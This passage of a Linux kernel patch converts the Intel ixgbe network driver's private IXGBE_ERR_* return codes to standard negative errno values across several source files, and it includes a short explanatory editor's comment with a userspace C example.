+@@ -1595,7 +1594,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flexible byte mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Now mask VM pool and destination IPv6 - bits 5 and 2 */
+@@ -1824,7 +1823,7 @@ static s32 ixgbe_identify_phy_82599(struct ixgbe_hw *hw)
+ 
+ 	/* Return error if SFP module has been detected but is not supported */
+ 	if (hw->phy.type == ixgbe_phy_sfp_unsupported)
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	return status;
+ }
+@@ -1863,13 +1862,13 @@ static s32 ixgbe_enable_rx_dma_82599(struct ixgbe_hw *hw, u32 regval)
+  *  Verifies that the installed firmware version is 0.6 or higher
+  *  for SFI devices. All 82599 SFI devices should have version 0.6 or higher.
+  *
+- *  Returns IXGBE_ERR_EEPROM_VERSION if the FW is not present or
+- *  if the FW version is not supported.
++ *  Return: -EACCES if the FW is not present or if the FW version is
++ *  not supported.
+  **/
+ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ {
+-	s32 status = IXGBE_ERR_EEPROM_VERSION;
+ 	u16 fw_offset, fw_ptp_cfg_offset;
++	s32 status = -EACCES;
+ 	u16 offset;
+ 	u16 fw_version = 0;
+ 
+@@ -1883,7 +1882,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 		goto fw_version_err;
+ 
+ 	if (fw_offset == 0 || fw_offset == 0xFFFF)
+-		return IXGBE_ERR_EEPROM_VERSION;
++		return -EACCES;
+ 
+ 	/* get the offset to the Pass Through Patch Configuration block */
+ 	offset = fw_offset + IXGBE_FW_PASSTHROUGH_PATCH_CONFIG_PTR;
+@@ -1891,7 +1890,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 		goto fw_version_err;
+ 
+ 	if (fw_ptp_cfg_offset == 0 || fw_ptp_cfg_offset == 0xFFFF)
+-		return IXGBE_ERR_EEPROM_VERSION;
++		return -EACCES;
+ 
+ 	/* get the firmware version */
+ 	offset = fw_ptp_cfg_offset + IXGBE_FW_PATCH_VERSION_4;
+@@ -1905,7 +1904,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 
+ fw_version_err:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", offset);
+-	return IXGBE_ERR_EEPROM_VERSION;
++	return -EACCES;
+ }
+ 
+ /**
+@@ -2038,7 +2037,7 @@ static s32 ixgbe_reset_pipeline_82599(struct ixgbe_hw *hw)
+ 
+ 	if (!(anlp1_reg & IXGBE_ANLP1_AN_STATE_MASK)) {
+ 		hw_dbg(hw, "auto negotiation not completed\n");
+-		ret_val = IXGBE_ERR_RESET_FAILED;
++		ret_val = -EIO;
+ 		goto reset_pipeline_out;
+ 	}
+ 
+@@ -2087,7 +2086,7 @@ static s32 ixgbe_read_i2c_byte_82599(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 		if (!timeout) {
+ 			hw_dbg(hw, "Driver can't access resource, acquiring I2C bus timeout.\n");
+-			status = IXGBE_ERR_I2C;
++			status = -EIO;
+ 			goto release_i2c_access;
+ 		}
+ 	}
+@@ -2141,7 +2140,7 @@ static s32 ixgbe_write_i2c_byte_82599(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 		if (!timeout) {
+ 			hw_dbg(hw, "Driver can't access resource, acquiring I2C bus timeout.\n");
+-			status = IXGBE_ERR_I2C;
++			status = -EIO;
+ 			goto release_i2c_access;
+ 		}
+ 	}
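/*
 * Editor's note: the ixgbe hunks above fold the driver-private IXGBE_ERR_*
 * space into standard negative errno values (-EIO, -EINVAL, -EBUSY,
 * -ENOENT, -EOPNOTSUPP, ...). One payoff is that callers and log helpers
 * can decode the code uniformly; a userspace illustration:
 */
#include <stdio.h>
#include <string.h>
#include <errno.h>

static int identify_sfp(int present)
{
	if (!present)
		return -ENOENT;	/* was IXGBE_ERR_SFP_NOT_PRESENT */
	return 0;
}

int main(void)
{
	int err = identify_sfp(0);

	if (err)	/* standard decoding works on the shared namespace */
		printf("identify_sfp: %s\n", strerror(-err));
	return 0;
}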
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
+index 38c4609bd4292..5688a6ad4b3b2 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_common.c
+@@ -124,7 +124,7 @@ s32 ixgbe_setup_fc_generic(struct ixgbe_hw *hw)
+ 	 */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_dbg(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	/*
+@@ -215,7 +215,7 @@ s32 ixgbe_setup_fc_generic(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	if (hw->mac.type != ixgbe_mac_X540) {
+@@ -500,7 +500,7 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 
+ 	if (pba_num == NULL) {
+ 		hw_dbg(hw, "PBA string buffer was null\n");
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	ret_val = hw->eeprom.ops.read(hw, IXGBE_PBANUM0_PTR, &data);
+@@ -526,7 +526,7 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 		/* we will need 11 characters to store the PBA */
+ 		if (pba_num_size < 11) {
+ 			hw_dbg(hw, "PBA string buffer too small\n");
+-			return IXGBE_ERR_NO_SPACE;
++			return -ENOSPC;
+ 		}
+ 
+ 		/* extract hex string from data and pba_ptr */
+@@ -563,13 +563,13 @@ s32 ixgbe_read_pba_string_generic(struct ixgbe_hw *hw, u8 *pba_num,
+ 
+ 	if (length == 0xFFFF || length == 0) {
+ 		hw_dbg(hw, "NVM PBA number section invalid length\n");
+-		return IXGBE_ERR_PBA_SECTION;
++		return -EIO;
+ 	}
+ 
+ 	/* check if pba_num buffer is big enough */
+ 	if (pba_num_size  < (((u32)length * 2) - 1)) {
+ 		hw_dbg(hw, "PBA string buffer too small\n");
+-		return IXGBE_ERR_NO_SPACE;
++		return -ENOSPC;
+ 	}
+ 
+ 	/* trim pba length from start of string */
+@@ -805,7 +805,7 @@ s32 ixgbe_led_on_generic(struct ixgbe_hw *hw, u32 index)
+ 	u32 led_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn on the LED, set mode to ON. */
+ 	led_reg &= ~IXGBE_LED_MODE_MASK(index);
+@@ -826,7 +826,7 @@ s32 ixgbe_led_off_generic(struct ixgbe_hw *hw, u32 index)
+ 	u32 led_reg = IXGBE_READ_REG(hw, IXGBE_LEDCTL);
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* To turn off the LED, set mode to OFF. */
+ 	led_reg &= ~IXGBE_LED_MODE_MASK(index);
+@@ -904,11 +904,8 @@ s32 ixgbe_write_eeprom_buffer_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset + words > hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || (offset + words > hw->eeprom.word_size))
++		return -EINVAL;
+ 
+ 	/*
+ 	 * The EEPROM page size cannot be queried from the chip. We do lazy
+@@ -962,7 +959,7 @@ static s32 ixgbe_write_eeprom_buffer_bit_bang(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	if (ixgbe_ready_eeprom(hw) != 0) {
+ 		ixgbe_release_eeprom(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	for (i = 0; i < words; i++) {
+@@ -1028,7 +1025,7 @@ s32 ixgbe_write_eeprom_generic(struct ixgbe_hw *hw, u16 offset, u16 data)
+ 	hw->eeprom.ops.init_params(hw);
+ 
+ 	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++		return -EINVAL;
+ 
+ 	return ixgbe_write_eeprom_buffer_bit_bang(hw, offset, 1, &data);
+ }
+@@ -1050,11 +1047,8 @@ s32 ixgbe_read_eeprom_buffer_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset + words > hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || (offset + words > hw->eeprom.word_size))
++		return -EINVAL;
+ 
+ 	/*
+ 	 * We cannot hold synchronization semaphores for too long
+@@ -1099,7 +1093,7 @@ static s32 ixgbe_read_eeprom_buffer_bit_bang(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	if (ixgbe_ready_eeprom(hw) != 0) {
+ 		ixgbe_release_eeprom(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	for (i = 0; i < words; i++) {
+@@ -1142,7 +1136,7 @@ s32 ixgbe_read_eeprom_bit_bang_generic(struct ixgbe_hw *hw, u16 offset,
+ 	hw->eeprom.ops.init_params(hw);
+ 
+ 	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++		return -EINVAL;
+ 
+ 	return ixgbe_read_eeprom_buffer_bit_bang(hw, offset, 1, data);
+ }
+@@ -1165,11 +1159,8 @@ s32 ixgbe_read_eerd_buffer_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || offset >= hw->eeprom.word_size)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < words; i++) {
+ 		eerd = ((offset + i) << IXGBE_EEPROM_RW_ADDR_SHIFT) |
+@@ -1262,11 +1253,8 @@ s32 ixgbe_write_eewr_buffer_generic(struct ixgbe_hw *hw, u16 offset,
+ 
+ 	hw->eeprom.ops.init_params(hw);
+ 
+-	if (words == 0)
+-		return IXGBE_ERR_INVALID_ARGUMENT;
+-
+-	if (offset >= hw->eeprom.word_size)
+-		return IXGBE_ERR_EEPROM;
++	if (words == 0 || offset >= hw->eeprom.word_size)
++		return -EINVAL;
+ 
+ 	for (i = 0; i < words; i++) {
+ 		eewr = ((offset + i) << IXGBE_EEPROM_RW_ADDR_SHIFT) |
+@@ -1328,7 +1316,7 @@ static s32 ixgbe_poll_eerd_eewr_done(struct ixgbe_hw *hw, u32 ee_reg)
+ 		}
+ 		udelay(5);
+ 	}
+-	return IXGBE_ERR_EEPROM;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1344,7 +1332,7 @@ static s32 ixgbe_acquire_eeprom(struct ixgbe_hw *hw)
+ 	u32 i;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_EEP_SM) != 0)
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	eec = IXGBE_READ_REG(hw, IXGBE_EEC(hw));
+ 
+@@ -1366,7 +1354,7 @@ static s32 ixgbe_acquire_eeprom(struct ixgbe_hw *hw)
+ 		hw_dbg(hw, "Could not acquire EEPROM grant\n");
+ 
+ 		hw->mac.ops.release_swfw_sync(hw, IXGBE_GSSR_EEP_SM);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	/* Setup EEPROM for Read/Write */
+@@ -1419,7 +1407,7 @@ static s32 ixgbe_get_eeprom_semaphore(struct ixgbe_hw *hw)
+ 		swsm = IXGBE_READ_REG(hw, IXGBE_SWSM(hw));
+ 		if (swsm & IXGBE_SWSM_SMBI) {
+ 			hw_dbg(hw, "Software semaphore SMBI between device drivers not granted.\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -1447,7 +1435,7 @@ static s32 ixgbe_get_eeprom_semaphore(struct ixgbe_hw *hw)
+ 	if (i >= timeout) {
+ 		hw_dbg(hw, "SWESMBI Software EEPROM semaphore not granted.\n");
+ 		ixgbe_release_eeprom_semaphore(hw);
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -1503,7 +1491,7 @@ static s32 ixgbe_ready_eeprom(struct ixgbe_hw *hw)
+ 	 */
+ 	if (i >= IXGBE_EEPROM_MAX_RETRY_SPI) {
+ 		hw_dbg(hw, "SPI EEPROM Status error\n");
+-		return IXGBE_ERR_EEPROM;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -1715,7 +1703,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 	for (i = IXGBE_PCIE_ANALOG_PTR; i < IXGBE_FW_PTR; i++) {
+ 		if (hw->eeprom.ops.read(hw, i, &pointer)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		/* If the pointer seems invalid */
+@@ -1724,7 +1712,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 
+ 		if (hw->eeprom.ops.read(hw, pointer, &length)) {
+ 			hw_dbg(hw, "EEPROM read failed\n");
+-			return IXGBE_ERR_EEPROM;
++			return -EIO;
+ 		}
+ 
+ 		if (length == 0xFFFF || length == 0)
+@@ -1733,7 +1721,7 @@ s32 ixgbe_calc_eeprom_checksum_generic(struct ixgbe_hw *hw)
+ 		for (j = pointer + 1; j <= pointer + length; j++) {
+ 			if (hw->eeprom.ops.read(hw, j, &word)) {
+ 				hw_dbg(hw, "EEPROM read failed\n");
+-				return IXGBE_ERR_EEPROM;
++				return -EIO;
+ 			}
+ 			checksum += word;
+ 		}
+@@ -1786,7 +1774,7 @@ s32 ixgbe_validate_eeprom_checksum_generic(struct ixgbe_hw *hw,
+ 	 * calculated checksum
+ 	 */
+ 	if (read_checksum != checksum)
+-		status = IXGBE_ERR_EEPROM_CHECKSUM;
++		status = -EIO;
+ 
+ 	/* If the user cares, return the calculated checksum */
+ 	if (checksum_val)
+@@ -1845,7 +1833,7 @@ s32 ixgbe_set_rar_generic(struct ixgbe_hw *hw, u32 index, u8 *addr, u32 vmdq,
+ 	/* Make sure we are using a valid rar index range */
+ 	if (index >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", index);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	/* setup VMDq pool selection before this RAR gets enabled */
+@@ -1897,7 +1885,7 @@ s32 ixgbe_clear_rar_generic(struct ixgbe_hw *hw, u32 index)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (index >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", index);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	/*
+@@ -2146,7 +2134,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Validate the water mark configuration. */
+ 	if (!hw->fc.pause_time)
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 
+ 	/* Low water mark of zero causes XOFF floods */
+ 	for (i = 0; i < MAX_TRAFFIC_CLASS; i++) {
+@@ -2155,7 +2143,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 			if (!hw->fc.low_water[i] ||
+ 			    hw->fc.low_water[i] >= hw->fc.high_water[i]) {
+ 				hw_dbg(hw, "Invalid water mark configuration\n");
+-				return IXGBE_ERR_INVALID_LINK_SETTINGS;
++				return -EINVAL;
+ 			}
+ 		}
+ 	}
+@@ -2212,7 +2200,7 @@ s32 ixgbe_fc_enable_generic(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Set 802.3x based flow control settings. */
+@@ -2269,7 +2257,7 @@ s32 ixgbe_negotiate_fc(struct ixgbe_hw *hw, u32 adv_reg, u32 lp_reg,
+ 		       u32 adv_sym, u32 adv_asm, u32 lp_sym, u32 lp_asm)
+ {
+ 	if ((!(adv_reg)) ||  (!(lp_reg)))
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EINVAL;
+ 
+ 	if ((adv_reg & adv_sym) && (lp_reg & lp_sym)) {
+ 		/*
+@@ -2321,7 +2309,7 @@ static s32 ixgbe_fc_autoneg_fiber(struct ixgbe_hw *hw)
+ 	linkstat = IXGBE_READ_REG(hw, IXGBE_PCS1GLSTA);
+ 	if ((!!(linkstat & IXGBE_PCS1GLSTA_AN_COMPLETE) == 0) ||
+ 	    (!!(linkstat & IXGBE_PCS1GLSTA_AN_TIMED_OUT) == 1))
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EIO;
+ 
+ 	pcs_anadv_reg = IXGBE_READ_REG(hw, IXGBE_PCS1GANA);
+ 	pcs_lpab_reg = IXGBE_READ_REG(hw, IXGBE_PCS1GANLP);
+@@ -2353,12 +2341,12 @@ static s32 ixgbe_fc_autoneg_backplane(struct ixgbe_hw *hw)
+ 	 */
+ 	links = IXGBE_READ_REG(hw, IXGBE_LINKS);
+ 	if ((links & IXGBE_LINKS_KX_AN_COMP) == 0)
+-		return IXGBE_ERR_FC_NOT_NEGOTIATED;
++		return -EIO;
+ 
+ 	if (hw->mac.type == ixgbe_mac_82599EB) {
+ 		links2 = IXGBE_READ_REG(hw, IXGBE_LINKS2);
+ 		if ((links2 & IXGBE_LINKS2_AN_SUPPORTED) == 0)
+-			return IXGBE_ERR_FC_NOT_NEGOTIATED;
++			return -EIO;
+ 	}
+ 	/*
+ 	 * Read the 10g AN autoc and LP ability registers and resolve
+@@ -2407,8 +2395,8 @@ static s32 ixgbe_fc_autoneg_copper(struct ixgbe_hw *hw)
+  **/
+ void ixgbe_fc_autoneg(struct ixgbe_hw *hw)
+ {
+-	s32 ret_val = IXGBE_ERR_FC_NOT_NEGOTIATED;
+ 	ixgbe_link_speed speed;
++	s32 ret_val = -EIO;
+ 	bool link_up;
+ 
+ 	/*
+@@ -2510,7 +2498,7 @@ static u32 ixgbe_pcie_timeout_poll(struct ixgbe_hw *hw)
+  *  @hw: pointer to hardware structure
+  *
+  *  Disables PCI-Express primary access and verifies there are no pending
+- *  requests. IXGBE_ERR_PRIMARY_REQUESTS_PENDING is returned if primary disable
++ *  requests. -EALREADY is returned if the primary disable
+ *  bit hasn't caused the primary requests to be disabled; otherwise 0
+ *  is returned, signifying that primary requests are disabled.
+  **/
+@@ -2575,7 +2563,7 @@ gio_disable_fail:
+ 	}
+ 
+ 	hw_dbg(hw, "PCIe transaction pending bit also did not clear.\n");
+-	return IXGBE_ERR_PRIMARY_REQUESTS_PENDING;
++	return -EALREADY;
+ }
+ 
+ /**
+@@ -2600,7 +2588,7 @@ s32 ixgbe_acquire_swfw_sync(struct ixgbe_hw *hw, u32 mask)
+ 		 * SW_FW_SYNC bits (not just NVM)
+ 		 */
+ 		if (ixgbe_get_eeprom_semaphore(hw))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		gssr = IXGBE_READ_REG(hw, IXGBE_GSSR);
+ 		if (!(gssr & (fwmask | swmask))) {
+@@ -2620,7 +2608,7 @@ s32 ixgbe_acquire_swfw_sync(struct ixgbe_hw *hw, u32 mask)
+ 		ixgbe_release_swfw_sync(hw, gssr & (fwmask | swmask));
+ 
+ 	usleep_range(5000, 10000);
+-	return IXGBE_ERR_SWFW_SYNC;
++	return -EBUSY;
+ }
+ 
+ /**
+@@ -2757,7 +2745,7 @@ s32 ixgbe_blink_led_start_generic(struct ixgbe_hw *hw, u32 index)
+ 	s32 ret_val;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/*
+ 	 * Link must be up to auto-blink the LEDs;
+@@ -2803,7 +2791,7 @@ s32 ixgbe_blink_led_stop_generic(struct ixgbe_hw *hw, u32 index)
+ 	s32 ret_val;
+ 
+ 	if (index > 3)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	ret_val = hw->mac.ops.prot_autoc_read(hw, &locked, &autoc_reg);
+ 	if (ret_val)
+@@ -2963,7 +2951,7 @@ s32 ixgbe_clear_vmdq_generic(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	mpsar_lo = IXGBE_READ_REG(hw, IXGBE_MPSAR_LO(rar));
+@@ -3014,7 +3002,7 @@ s32 ixgbe_set_vmdq_generic(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	if (vmdq < 32) {
+@@ -3091,7 +3079,7 @@ static s32 ixgbe_find_vlvf_slot(struct ixgbe_hw *hw, u32 vlan, bool vlvf_bypass)
+ 	 * will simply bypass the VLVF if there are no entries present in the
+ 	 * VLVF that contain our VLAN
+ 	 */
+-	first_empty_slot = vlvf_bypass ? IXGBE_ERR_NO_SPACE : 0;
++	first_empty_slot = vlvf_bypass ? -ENOSPC : 0;
+ 
+ 	/* add VLAN enable bit for comparison */
+ 	vlan |= IXGBE_VLVF_VIEN;
+@@ -3115,7 +3103,7 @@ static s32 ixgbe_find_vlvf_slot(struct ixgbe_hw *hw, u32 vlan, bool vlvf_bypass)
+ 	if (!first_empty_slot)
+ 		hw_dbg(hw, "No space in VLVF.\n");
+ 
+-	return first_empty_slot ? : IXGBE_ERR_NO_SPACE;
++	return first_empty_slot ? : -ENOSPC;
+ }
+ 
+ /**
+@@ -3135,7 +3123,7 @@ s32 ixgbe_set_vfta_generic(struct ixgbe_hw *hw, u32 vlan, u32 vind,
+ 	s32 vlvf_index;
+ 
+ 	if ((vlan > 4095) || (vind > 63))
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/*
+ 	 * this is a 2 part operation - first the VFTA, then the
+@@ -3596,7 +3584,8 @@ u8 ixgbe_calculate_checksum(u8 *buffer, u32 length)
+  *
+  *  Communicates with the manageability block. On success return 0
+  *  else returns semaphore error when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
++ *  semaphore, -EINVAL when incorrect parameters are passed or -EIO when
++ *  command fails.
+  *
+  *  This function assumes that the IXGBE_GSSR_SW_MNG_SM semaphore is held
+  *  by the caller.
+@@ -3609,7 +3598,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 
+ 	if (!length || length > IXGBE_HI_MAX_BLOCK_BYTE_LENGTH) {
+ 		hw_dbg(hw, "Buffer length failure buffersize-%d.\n", length);
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EINVAL;
+ 	}
+ 
+ 	/* Set bit 9 of FWSTS clearing FW reset indication */
+@@ -3620,13 +3609,13 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 	hicr = IXGBE_READ_REG(hw, IXGBE_HICR);
+ 	if (!(hicr & IXGBE_HICR_EN)) {
+ 		hw_dbg(hw, "IXGBE_HOST_EN bit disabled.\n");
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EIO;
+ 	}
+ 
+ 	/* Calculate length in DWORDs. We must be DWORD aligned */
+ 	if (length % sizeof(u32)) {
+ 		hw_dbg(hw, "Buffer length failure, not aligned to dword");
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	dword_len = length >> 2;
+@@ -3651,7 +3640,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+ 	/* Check command successful completion. */
+ 	if ((timeout && i == timeout) ||
+ 	    !(IXGBE_READ_REG(hw, IXGBE_HICR) & IXGBE_HICR_SV))
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EIO;
+ 
+ 	return 0;
+ }
+@@ -3671,7 +3660,7 @@ s32 ixgbe_hic_unlocked(struct ixgbe_hw *hw, u32 *buffer, u32 length,
+  *  in these cases.
+  *
+  *  Communicates with the manageability block.  On success return 0
+- *  else return IXGBE_ERR_HOST_INTERFACE_COMMAND.
++ *  else return -EIO or -EINVAL.
+  **/
+ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 				 u32 length, u32 timeout,
+@@ -3686,7 +3675,7 @@ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 
+ 	if (!length || length > IXGBE_HI_MAX_BLOCK_BYTE_LENGTH) {
+ 		hw_dbg(hw, "Buffer length failure buffersize-%d.\n", length);
+-		return IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		return -EINVAL;
+ 	}
+ 	/* Take management host interface semaphore */
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, IXGBE_GSSR_SW_MNG_SM);
+@@ -3716,7 +3705,7 @@ s32 ixgbe_host_interface_command(struct ixgbe_hw *hw, void *buffer,
+ 
+ 	if (length < round_up(buf_len, 4) + hdr_size) {
+ 		hw_dbg(hw, "Buffer not large enough for reply message.\n");
+-		status = IXGBE_ERR_HOST_INTERFACE_COMMAND;
++		status = -EIO;
+ 		goto rel_out;
+ 	}
+ 
+@@ -3747,8 +3736,8 @@ rel_out:
+  *
+  *  Sends driver version number to firmware through the manageability
+  *  block.  On success return 0
+- *  else returns IXGBE_ERR_SWFW_SYNC when encountering an error acquiring
+- *  semaphore or IXGBE_ERR_HOST_INTERFACE_COMMAND when command fails.
++ *  else returns -EBUSY when encountering an error acquiring
++ *  semaphore or -EIO when command fails.
+  **/
+ s32 ixgbe_set_fw_drv_ver_generic(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 				 u8 build, u8 sub, __always_unused u16 len,
+@@ -3784,7 +3773,7 @@ s32 ixgbe_set_fw_drv_ver_generic(struct ixgbe_hw *hw, u8 maj, u8 min,
+ 		    FW_CEM_RESP_STATUS_SUCCESS)
+ 			ret_val = 0;
+ 		else
+-			ret_val = IXGBE_ERR_HOST_INTERFACE_COMMAND;
++			ret_val = -EIO;
+ 
+ 		break;
+ 	}
+@@ -3882,14 +3871,14 @@ static s32 ixgbe_get_ets_data(struct ixgbe_hw *hw, u16 *ets_cfg,
+ 		return status;
+ 
+ 	if ((*ets_offset == 0x0000) || (*ets_offset == 0xFFFF))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = hw->eeprom.ops.read(hw, *ets_offset, ets_cfg);
+ 	if (status)
+ 		return status;
+ 
+ 	if ((*ets_cfg & IXGBE_ETS_TYPE_MASK) != IXGBE_ETS_TYPE_EMC_SHIFTED)
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	return 0;
+ }
+@@ -3912,7 +3901,7 @@ s32 ixgbe_get_thermal_sensor_data_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Only support thermal sensors attached to physical port 0 */
+ 	if ((IXGBE_READ_REG(hw, IXGBE_STATUS) & IXGBE_STATUS_LAN_ID_1))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = ixgbe_get_ets_data(hw, &ets_cfg, &ets_offset);
+ 	if (status)
+@@ -3972,7 +3961,7 @@ s32 ixgbe_init_thermal_sensor_thresh_generic(struct ixgbe_hw *hw)
+ 
+ 	/* Only support thermal sensors attached to physical port 0 */
+ 	if ((IXGBE_READ_REG(hw, IXGBE_STATUS) & IXGBE_STATUS_LAN_ID_1))
+-		return IXGBE_NOT_IMPLEMENTED;
++		return -EOPNOTSUPP;
+ 
+ 	status = ixgbe_get_ets_data(hw, &ets_cfg, &ets_offset);
+ 	if (status)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index 0051aa676e19e..f8e65e18284ee 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -3339,7 +3339,7 @@ static int ixgbe_get_module_eeprom(struct net_device *dev,
+ {
+ 	struct ixgbe_adapter *adapter = netdev_priv(dev);
+ 	struct ixgbe_hw *hw = &adapter->hw;
+-	s32 status = IXGBE_ERR_PHY_ADDR_INVALID;
++	s32 status = -EFAULT;
